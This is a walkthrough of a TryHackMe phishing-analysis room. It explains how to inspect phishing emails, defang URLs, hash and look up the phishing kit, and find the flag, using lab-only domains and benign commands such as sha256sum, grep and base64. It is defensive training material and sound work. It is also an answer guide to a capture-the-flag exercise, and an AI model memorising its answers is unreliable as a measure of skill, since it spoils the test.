Snapped “Phish”-ing Line TryHackMe Walkthrough

Walkthrough for new TryHackMe Phishing analysis room, try it here : https://tryhackme.com/room/snappedphishingline

*It is advised to go through this walkthrough only after you have tried all the tricks at your hand.

Question 1:
Who is the individual who received an email attachment containing a PDF?

For this, we need to open the folder called ‘phish-emails’ on the desktop. It contains 5 emails, checking each one by one will give us the answer to our first question —

Question 2:
What email address was used by the adversary to send the phishing emails?

‘From’ header of any of the email will provide answer to that question.

Question 3:
What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)

Note : Defanging is done to make the URL harmless or un-clickable. It makes the URL safe to share or for researching on your own.

Open the email for user Zoe Duncan. This email has an attachment with a .html extension. Click the attachment and choose to open with a text editor.

Copy the redirection URL without apostrophes or quotation marks.

Now open the firefox browser in the local virtual machine, CyberChef tool is conveniently bookmarked for us (Thank you room creator). Open CyberChef and under ‘Operations’, search “defang”.

Drag and drop ‘Defang URL’ in ‘Recipe’ area.
Paste the copied URL in input field and the defanged URL will be available in the output. This is the final answer to the question.

Question 4:
What is the URL to the .zip archive of the phishing kit?

From the obtained redirection URL, we see that it takes us to a domain called kennaroads.buzz. Let’s visit this website. Not much of interest.

URL also provides us with directories and subdirectories within the domain, namely /data. Let’s visit kennaroads.buzz/data.

We can see the zip archive mentioned in the question, right-click the file and copy the URL. Defang it using CyberChef and submit the answer.

Question 5:
What is the SHA256 hash of the phishing kit archive?

Download the zip archive on local VM and open the terminal in Downloads folder. Use the following command to get SHA256 hash for the archive.

sha256sum file_name.zip

Question 6:
When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)

Checking the hints provided in the task, VirusTotal is the tool we are looking for. An open-source threat intelligence tool.
Visit virustotal.com in your own browser (Provided VM doesn’t have access to the internet), click “Search” option on the homepage and paste the hash calculated for the archive in the previous question.
Look around to get the answer to the question.

Question 7:
When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)

Search for the phishing domain (kennaroads.buzz) on virustotal, this will provide many details about the domain including the answer to our question.

Question 8:
What was the email address of the user who submitted their password twice?

Explore the domain and sub-directories a little, there is a file that contains all of the stolen credentials. Check which user submitted their details twice.

Question 9:
What was the email address used by the adversary to collect compromised credentials?

Now it’s time to examine the zip archive. Look for a file called submit.php, this script simply emails the stolen credentials to the attacker. Whose email can be found in the script itself. Look closely.

Question 10:
The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in “@gmail.com”?

One way to do this is — you can check for each text/script file for string “@gmail.com”
But since we’re on Linux, we can use grep to recursively search for our string even in directories full of files. Which is the fastest method.
Use the following command to get an answer to the given question.

grep -r @gmail.com .

Question 11:
What is the hidden flag?

We don’t see anything of use in zip archive or the visible directories in the domain. Checking the task hint, it wants us to make some adjustments to the phishing URL. After some manual brute forcing, I found something at

kennaroads.buzz/data/Update365/office365/flag.txt

not quite the flag ! But only a little stretch now.
By the looks, it seems like a base64 encoded string. Let’s copy and store it in text file.
Decode the string using following command —

base64 -d encoded.txt > decoded.txt

We get the flag !!!

But REVERSED :(

You can reverse a string in linux using the rev command, use it on the decoded string to see the actual flag :)

rev decoded.txt